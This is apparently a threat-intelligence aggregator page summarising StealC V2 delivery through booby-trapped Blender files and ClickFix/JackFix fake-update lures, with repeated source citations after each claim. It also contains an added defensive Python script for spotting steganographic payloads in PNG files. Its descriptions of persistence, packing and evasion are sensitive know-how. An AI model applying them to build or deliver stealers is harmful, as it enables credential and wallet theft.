- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Once extracted into the Windows temp directory, the malware created LNK files to secure persistence, then used Pyramid C2 channels to retrieve encrypted payloads.
First reported: 24.11.2025 16:00 · 3 sources, 7 articles
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- StealC V2, promoted on underground forums since April 2025, has rapidly expanded its feature set.
  First reported: 24.11.2025 16:00 · 3 sources, 7 articles
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- It now targets more than 23 browsers, over 100 plugins, more than 15 desktop wallets, and a range of messaging, VPN and mail clients.
  First reported: 24.11.2025 16:00 · 3 sources, 7 articles
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- Its pricing, from $200 per month to $800 for 6 months, has made it accessible to low-tier cybercriminals seeking ready-to-use tools.
  First reported: 24.11.2025 16:00 · 3 sources, 7 articles
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- Several indicators of compromise (IoCs) surfaced during the investigation, including malicious .blend files hosted on CGTrader, payload retrieval through multiple workers.dev domains, ZIP archives containing Python stealers and persistence components, and command-and-control (C2) communication across several Pyramid-linked IPs.
  First reported: 24.11.2025 16:00 · 3 sources, 6 articles
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Security Bug in StealC Malware Panel Let Researchers Spy on Threat Actor Operations — thehackernews.com — 19.01.2026 08:53
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- ClickFix attack variants have been observed using a realistic-looking Windows Update animation in a full-screen browser page to trick users into executing malicious commands.
  First reported: 24.11.2025 22:42 · 2 sources, 6 articles
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The new ClickFix variants drop the LummaC2 and Rhadamanthys information stealers.
  First reported: 24.11.2025 22:42 · 2 sources, 6 articles
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The attack uses steganography to encode the final malware payload inside an image.
  First reported: 24.11.2025 22:42 · 2 sources, 6 articles
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The process involves multiple stages that use PowerShell code and a .NET assembly (the Stego Loader) responsible for reconstructing the final payload embedded inside a PNG file in an encrypted state.
  First reported: 24.11.2025 22:42 · 2 sources, 6 articles
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
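The page does not describe how the Stego Loader locates or decrypts the payload inside the PNG, so the following is not a reimplementation of it. It is an added triage example (not code from the campaign or from any of the cited articles) that shows what a defender can check cheaply in an image pulled from a suspicious download chain: the PNG chunk structure, chunk types the specification does not define, CRC mismatches, IDAT data far larger than the declared image needs, and bytes appended after IEND. The chunk name `stEg`, the `build_sample_png` helper and the `SAMPLES` files are constructed for the test and are not real artifacts.

```python
"""Triage helper for PNG files that may carry a hidden payload (added illustration)."""
import math
import struct
import zlib
from collections import Counter

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG specification; anything else deserves a look.
STANDARD_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA", b"iCCP",
    b"sBIT", b"sRGB", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"hIST", b"pHYs",
    b"sPLT", b"tIME",
}
CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}  # colour type -> samples per pixel


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; encrypted or compressed blobs sit close to 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_chunks(blob: bytes):
    """Return ([(type, data, crc_ok), ...], bytes found after IEND)."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos, chunks = len(PNG_SIG), []
    while pos + 12 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        crc_raw = blob[pos + 8 + length:pos + 12 + length]
        if len(data) < length or len(crc_raw) < 4:
            break  # truncated chunk: stop rather than misread the tail
        crc_ok = zlib.crc32(ctype + data) == struct.unpack(">I", crc_raw)[0]
        chunks.append((ctype, data, crc_ok))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, blob[pos:]


def triage_png(blob: bytes) -> dict:
    """Flag structure a decoder never needs: odd chunks, bad CRCs, oversized IDAT, trailing data."""
    chunks, trailing = parse_chunks(blob)
    findings = []
    idat_total = sum(len(d) for t, d, _ in chunks if t == b"IDAT")
    for ctype, data, crc_ok in chunks:
        name = ctype.decode("latin-1")
        if ctype not in STANDARD_CHUNKS:
            findings.append(f"non-standard chunk {name}: {len(data)} bytes, entropy {shannon_entropy(data):.2f}")
        if not crc_ok:
            findings.append(f"CRC mismatch on {name}")
        if ctype in (b"tEXt", b"zTXt", b"iTXt") and len(data) > 4096:
            findings.append(f"oversized text chunk {name}: {len(data)} bytes")
    ihdr = next((d for t, d, _ in chunks if t == b"IHDR"), None)
    if ihdr is not None and len(ihdr) == 13:
        width, height, depth, colour = struct.unpack(">IIBB", ihdr[:10])
        bits_per_pixel = CHANNELS.get(colour, 4) * depth
        raw = height * (1 + math.ceil(width * bits_per_pixel / 8))  # filter byte + scanline per row
        # zlib output cannot exceed the raw size by much; the slack covers interlacing and headers.
        if idat_total > raw * 1.25 + 4096:
            findings.append(f"IDAT holds {idat_total} bytes for an image whose raw size is {raw}")
    if trailing:
        findings.append(f"{len(trailing)} bytes after IEND, entropy {shannon_entropy(trailing):.2f}")
    return {
        "chunks": [t.decode("latin-1") for t, _, _ in chunks],
        "idat_bytes": idat_total,
        "trailing_bytes": len(trailing),
        "findings": findings,
        "suspicious": bool(findings),
    }


def _chunk(ctype: bytes, data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))


def build_sample_png(extra_chunks=(), idat=None, trailing=b"") -> bytes:
    """Constructed 1x1 greyscale PNG used only to exercise the triage; not a real artifact."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    body = _chunk(b"IHDR", ihdr)
    for ctype, data in extra_chunks:
        body += _chunk(ctype, data)
    body += _chunk(b"IDAT", idat if idat is not None else zlib.compress(b"\x00\x00"))
    body += _chunk(b"IEND", b"")
    return PNG_SIG + body + trailing


# Constructed test files; the "payload" is just a 0..255 byte ramp, not malware.
_RAMP = bytes(range(256))
SAMPLES = {
    "clean": build_sample_png(),
    "appended": build_sample_png(extra_chunks=[(b"stEg", _RAMP * 8)], trailing=_RAMP * 4),
    "stuffed_idat": build_sample_png(idat=zlib.compress(_RAMP * 80, 0)),  # level 0 = stored, no shrink
}

if __name__ == "__main__":
    for label, png in SAMPLES.items():
        print(label, triage_png(png))
```

Entropy near 8.0 in a non-standard chunk or after IEND is consistent with the encrypted state the entry describes, but it is only a prompt for deeper analysis: legitimate metadata chunks and harmless trailing bytes exist, so treat the findings as triage signals, not verdicts.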
- The shellcode holding the infostealer samples is packed using the Donut tool.
  First reported: 24.11.2025 22:42 · 2 sources, 6 articles
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The Rhadamanthys variant that used the Windows Update lure was first spotted by researchers back in October, before Operation Endgame took down parts of its infrastructure on November 13.
  First reported: 24.11.2025 22:42 · 2 sources, 6 articles
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The StealC V2 malware used in this campaign was the latest variant of the second major version of the malware.
  First reported: 25.11.2025 00:00 · 2 sources, 6 articles
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The StealC malware supports exfiltration from 23+ browsers, with server-side credential decryption and compatibility with Chrome 132+.
  First reported: 25.11.2025 00:00 · 2 sources, 6 articles
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The StealC malware supports exfiltration from 100+ cryptocurrency wallet browser extensions and 15+ cryptocurrency wallet apps.
  First reported: 25.11.2025 00:00 · 2 sources, 6 articles
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The StealC malware supports exfiltration from Telegram, Discord, Tox, Pidgin, VPN clients (ProtonVPN, OpenVPN), and mail clients (Thunderbird).
  First reported: 25.11.2025 00:00 · 2 sources, 6 articles
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The StealC malware has an updated UAC bypass mechanism.
  First reported: 25.11.2025 00:00 · 2 sources, 6 articles
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The malware loader is fetched from a Cloudflare Workers domain.
  First reported: 25.11.2025 00:00 · 2 sources, 6 articles
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The PowerShell script retrieves two ZIP archives, ZalypaGyliveraV1 and BLENDERX, from attacker-controlled IPs.
  First reported: 25.11.2025 00:00 · 2 sources, 6 articles
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The archives unpack into the %TEMP% folder and drop LNK files in the Startup directory for persistence.
  First reported: 25.11.2025 00:00 · 2 sources, 6 articles
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The campaign deploys two payloads: the StealC infostealer and an auxiliary Python stealer, likely used for redundancy.
  First reported: 25.11.2025 00:00 · 2 sources, 6 articles
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- No security engine on VirusTotal detected the StealC variant analyzed by Morphisec.
  First reported: 25.11.2025 00:00 · 2 sources, 6 articles
- Malicious Blender model files deliver StealC infostealing malware — www.bleepingcomputer.com — 25.11.2025 00:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The campaign has been active for at least six months, involving the implantation of malicious .blend files on platforms like CGTrader.
  First reported: 25.11.2025 13:28 · 2 sources, 5 articles
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The attack chains involve uploading malicious .blend files to free 3D asset sites such as CGTrader containing a malicious "Rig_Ui.py" script.
  First reported: 25.11.2025 13:28 · 2 sources, 5 articles
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The malicious "Rig_Ui.py" script is executed as soon as the .blend files are opened with Blender's Auto Run feature enabled.
  First reported: 25.11.2025 13:28 · 2 sources, 5 articles
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The Rig_Ui.py script fetches a PowerShell script to download two ZIP archives.
  First reported: 25.11.2025 13:28 · 2 sources, 5 articles
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- One of the ZIP files contains a payload for StealC V2, while the second archive deploys a secondary Python-based stealer on the compromised host.
  First reported: 25.11.2025 13:28 · 2 sources, 5 articles
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The updated version of StealC, first announced in late April 2025, supports a wide range of information gathering features, allowing data to be extracted from 23 browsers, 100 web plugins and extensions, 15 cryptocurrency wallet apps, messaging services, VPNs, and email clients.
  First reported: 25.11.2025 13:28 · 2 sources, 5 articles
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The campaign shares similarities with a prior campaign linked to Russian-speaking threat actors that involved impersonating the Electronic Frontier Foundation (EFF) to target the online gaming community and infect them with StealC and Pyramid C2.
  First reported: 25.11.2025 13:28 · 2 sources, 5 articles
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The assessment is based on tactical similarities in both campaigns, including using decoy documents, evasive techniques, and background execution of malware.
  First reported: 25.11.2025 13:28 · 2 sources, 5 articles
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- Blender's documentation acknowledges the security risk posed by the ability to embed Python scripts in blend-files, since such scripts can execute arbitrary code when the file is opened.
  First reported: 25.11.2025 13:28 · 2 sources, 5 articles
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- A new campaign codenamed JackFix leverages fake adult websites (xHamster, PornHub clones) as its phishing mechanism, likely distributed via malvertising.
  First reported: 25.11.2025 16:18 · 2 sources, 4 articles
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
